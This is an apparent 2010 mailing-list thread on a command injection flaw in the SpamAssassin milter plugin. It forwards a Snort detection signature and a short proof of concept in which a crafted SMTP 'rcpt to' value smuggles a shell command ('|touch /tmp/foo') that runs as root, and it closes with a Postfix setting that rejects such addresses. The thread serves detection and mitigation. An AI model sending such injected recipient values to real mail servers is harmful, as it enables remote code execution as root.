Brian wrote:
On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
just a heads up: I don't know if there is a problem with SA milter, but
there is a snort signature for it now.
-------- Original Message --------
Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
Date: Mon, 8 Mar 2010 13:03:52 +0000
From: Kevin Ross <kevros...@googlemail.com>
To: emerging-s...@emergingthreats.net
<emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com>
alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible
SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt";
flow:established,to_server; content:"to|3A|"; nocase;
content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user;
reference:url,www.securityfocus.com/bid/38578
<http://www.securityfocus.com/bid/38578>;
reference:url,seclists.org/fulldisclosure/2010/Mar/140
<http://seclists.org/fulldisclosure/2010/Mar/140>; sid:1324412; rev:1;)
Kev
The key is this:
"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO)."
POC IS
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
fully-qualified address
quit
221 2.0.0 Bye
Connection closed by foreign host.
